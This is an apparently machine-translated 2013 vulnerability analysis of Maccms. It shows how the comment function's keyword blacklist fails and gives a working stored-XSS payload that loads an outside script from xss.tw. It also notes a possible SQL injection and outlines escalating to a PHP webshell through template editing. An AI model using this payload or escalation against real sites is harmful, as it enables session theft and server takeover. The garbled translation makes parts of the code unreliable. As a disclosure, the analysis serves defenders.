Maccms storage type xss

# Title: maccms simple analysis # Time: 2013.3 # Team: c0deplay # Author: peach ####################################### the storage xss analysis problem that affects the latest version of gbk utf8 lies in the plus, comment, and index. php page message adding function add () // here the wide character SQL injection can actually be used without following up $ c_content = iconv ('utf-8 ′, 'gb2312 // IGNORE ', $ c_content); $ c_name = badFilter (unescape ($ c_name); $ c_content = badFilter (unescape ($ c_content )); $ c_ip = getIP (); if (isN ($ c_name) {$ c_name = "";} $ C_addtime = date ('Y-m-d H: I: s', time ()); if ($ c_vid = "" | $ c_name = "" | $ c_content = "") {die ("<div id = 'comment _ load'> null </div>");} $ result = $ db-> query ("insert tbl_comment (c_name, c_content, c_ip, c_addtime, c_vid, c_type) values ('". $ c_name. "','". $ c_content. "','". $ c_ip. "','". $ c_addtime. "','". $ c_vid. "','". $ c_type. "')"); // write it to the database to see badFilter () inc/label. php function badFilter ($ Str) {$ filters = app_filter; // Constant $ badKeywordArr = explode (",", $ filters); // The explode function splits the string into an array for ($ s_ I = 0; $ s_ I <= count ($ badKeywordArr); $ s_ I = $ s_ I + 1) {$ Str = str_replace ($ badKeywordArr [$ s_ I], "***", $ Str); // use a string to replace another character in the string with the keyword} $ funresult = $ Str; return $ funresult;} // check the replaced keyword config. phpdefine ("app_filter", "http, //, com, cn, net, org, www "); the filtering effect is as follows: the http // com cn net org www keywords are filtered. This is a blacklist policy, and the exp bypassed is <script> var a = 'H'; var B = ': \/\ /'; Document. write ('<script src = "' + a + 'ttp '+ B +' xss. tw/xxx "> <\/script> '); </script> in this way, xss storage is born. Go to the background to modify the template. You can modify the file at will. Replace the path and file name to write the PHP file in one sentence.